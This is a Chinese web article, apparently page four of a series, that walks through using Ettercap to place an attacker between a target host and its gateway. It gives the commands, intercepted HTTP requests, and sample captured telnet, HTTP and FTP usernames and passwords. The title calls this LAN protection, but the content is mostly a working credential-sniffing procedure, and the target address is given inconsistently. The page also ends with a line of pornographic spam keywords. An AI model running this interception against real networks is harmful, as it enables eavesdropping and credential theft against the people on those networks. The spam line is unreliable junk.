當(dāng)前位置 : 首頁>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>網(wǎng)絡(luò)安全>正文

為局域網(wǎng)提供更安全的保護(hù)

http://m.yibo1263.com　2011/1/15 9:25:57 　來源:東北IT網(wǎng) 　編輯:葉子

　　【運(yùn)行環(huán)境】

　　Windows XP安裝虛擬機(jī)

　　Linux系統(tǒng)（這里選擇CentOS）

　　Ettercap軟件（下載地址：http://www.sans.org.cn/Soft/301.html ）

　　【跟我操作】

　　1.軟件安裝

　　解壓完之后就是編譯：./configure

　　make

　　2、假設(shè)我們的目標(biāo)主機(jī)是：210.197.248.192先判斷它操作系統(tǒng)　　

　　現(xiàn)在看看對(duì)方正在做什么：　　

　　[root@bolon ~]# ettercap -Nza 218.197.248.192 218.197.248.254

　　MAC1 MAC2 　　

　　這里218.197.248.254是網(wǎng)關(guān)。這樣，我們就是中間人了，它與外網(wǎng)所有數(shù)據(jù)都會(huì)在我們這里流過。不過被嗅探機(jī)器的內(nèi)網(wǎng)數(shù)據(jù)交換我們將看不到.下面是截取到的2段典型的HTTP交互數(shù)據(jù)，從第一段可以看出客戶正在看的網(wǎng)頁，腳本，瀏覽器語言以及客戶的操作系統(tǒng)等信息。從第2段可以看出主機(jī)的bannner等等,都是網(wǎng)站的基本資料
　　

　　GET /pcedu/script/title_edu.js HTTP/1.1.

　　Accept: */*.

　　Referer: http://wwwb.pconline.com.cn/pcedu/soft/doc/nt/10308.htm.

　　Accept-Language: zh-cn.

　　Accept-Encoding: gzip, deflate.

　　If-Modified-Since: Mon, 09 Sep 2002 09:18:53 GMT.

　　If-None-Match: "6f67c-2d5-3d7c677d".

　　User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt).

　　Host: wwwb.pconline.com.cn.

　　Connection: Keep-Alive.

　　

　　HTTP/1.1 200 OK.

　　Date: Sat, 01 Mar 2003 08:25:37 GMT.

　　Server: Apache/1.3.20 (Unix) PHP/4.1.2 mod_ssl/2.8.4 OpenSSL/0.9.6a.

　　X-Powered-By: PHP/4.1.2.

　　Keep-Alive: timeout=15, max=100.

　　Connection: Keep-Alive.

　　Transfer-Encoding: chunked.

　　Content-Type: text/html. 　　

　　當(dāng)然，它還可以記下很多網(wǎng)頁內(nèi)容，全是HTML源代碼，你可以抓下來，用HTM后綴保存，再用瀏覽器打開，好了，你看到的是什么，別人看到的就是什么。不過它對(duì)中文支持不很好，所以別人看見的中文你將無法看到，另一個(gè)程序LCRZOEX就很不錯(cuò)，在中文終端里，可以把所有中文網(wǎng)頁完整抓下來。一般黑客最感興趣的無非是密碼了，比如下面的組合，h是幫助，它會(huì)提供幫助信息　　

　　[root@bolon root]# ettercap -NCzs

　　ettercap 0.6.0 (c) 2001 ALoR & NaGA

　　Your IP: 218.197.248.226 with MAC: 00:00:E8:7B:CA:4E on Iface: eth0

　　Resolving 1 hostnames...

　　Press 'h' for help...

　　Sniffing (IP based): ANY:0 <--> ANY:0

　　TCP packets only... (default)

　　Collecting passwords...

　　[qq] - quit

　　[lL] - log all trafic to file(s)

　　space - stop/cont sniffing

　　

　　15:52:51 218.197.248.21:1027 <--> 61.114.4.41:23 telnet

　　USER: root

　　PASS: root

　　

　　15:54:53 218.197.248.46:1041 <--> 61.135.132.99:80 http

　　USER:dalin

　　PASS:7895865

　　http://www.sohu.com/

　　

　　16:13:14 218.197.248.192:2278 <--> 218.197.249.172:21 ftp

　　USER: CshjPASS: 123456

　　如果你輸入lL,系統(tǒng)在/ROOT下會(huì)自動(dòng)生成“20030301-Collected-passwords.log",里面會(huì)記錄下所有能嗅探到的密碼，看來TELNET，HTTP，F(xiàn)TP密碼都不能逃過他的法眼。

　　【總結(jié)】

　　Ettercap主要用于網(wǎng)絡(luò)的的數(shù)據(jù)嗅探、按照規(guī)則對(duì)數(shù)據(jù)攔截、對(duì)日志進(jìn)行分析。它能夠支持多種協(xié)議，而且還支持ssh和https這樣加密過的數(shù)據(jù)，和sniffer具有部分相同的功能，如有用數(shù)據(jù)的捕獲與分析，只不過實(shí)現(xiàn)的原理和步驟有所差異。

本新聞共4頁,當(dāng)前在第4頁 1 2 3 4

【收藏】【打印】【進(jìn)入論壇】

相關(guān)文章：

·巧設(shè)路由阻斷局域網(wǎng)病毒傳播路徑

·衡量局域網(wǎng)交換機(jī)功耗的測(cè)試

·企業(yè)局域網(wǎng)內(nèi)DHCP服務(wù)器的安全設(shè)計(jì)

·辦公室局域網(wǎng)打印機(jī)共享輕松設(shè)置

·三方面控制好你的局域網(wǎng)網(wǎng)速

·解決局域網(wǎng)常掉線問題

·無線局域網(wǎng)秘訣：因地制宜靈活布置

·無線局域網(wǎng)協(xié)議及基本用語全解析

·網(wǎng)管組建有線/無線局域網(wǎng)必看方案

·組建安全高效無線局域網(wǎng)

·家庭無線局域網(wǎng)優(yōu)劣取決于無線信號(hào)

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费